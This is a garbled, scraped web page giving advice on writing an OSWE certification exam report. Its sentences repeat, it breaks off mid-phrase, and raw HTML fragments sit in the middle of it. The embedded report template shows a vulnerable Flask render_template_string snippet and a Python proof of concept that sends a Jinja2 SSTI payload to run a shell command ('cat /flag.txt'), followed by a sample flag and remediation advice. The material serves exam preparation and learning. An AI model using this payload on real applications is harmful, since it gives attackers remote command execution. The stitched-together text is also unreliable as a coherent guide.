If you get a 100% on the hack but a 60% on the report, your overall score is ~80%, which is often a fail.
In the real world, a client pays you to find vulnerabilities. But if you cannot explain to the development team exactly how to trigger the bug and exactly where to fix it in the source code, your hack is useless. oswe exam report
Forgetting to include the vulnerable sections of the source code that you analyzed. If you get a 100% on the hack
If you need help structuring a ?
name = request.args.get('name') return render_template_string(f"<h1>Hello name</h1>") </code></pre> <p><strong>PoC</strong>:</p> <pre><code class="language-python">import requests payload = "''.__class__.__mro__[2].__subclasses__()[407]('cat /flag.txt', shell=True, stdout=-1).communicate()" requests.get(f"http://target/profile?name=payload") </code></pre> <p><strong>Exploit script</strong>: <code>exploit_ssti.py</code> (attached) <strong>Screenshot</strong>: Fig1 – command output showing flag</p> <p>[Repeat for second vulnerability chain on other target]</p> <h2>Flags</h2> <ul> <li><code>proof.txt</code> on app1: <code>e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855</code></li> <li>Screenshot of shell with <code>id</code> and <code>cat proof.txt</code></li> </ul> <h2>Remediation</h2> <p>Use <code>render_template()</code> with user-controlled variables passed as context, never string concatenation with <code>render_template_string()</code>.</p> <pre><code> --- Forgetting to include the vulnerable sections of the
Before finalizing your report, reset your exam lab environment through the control panel. Run your automated exploit script against the freshly reverted machine. If it fails to achieve RCE automatically, rewrite and debug the script until it functions flawlessly on a clean target.
You must create a dedicated section for each target application. For every target, break your documentation down into these five subsections: A. Vulnerability Identification (Code Analysis) This is where you prove your source code review skills.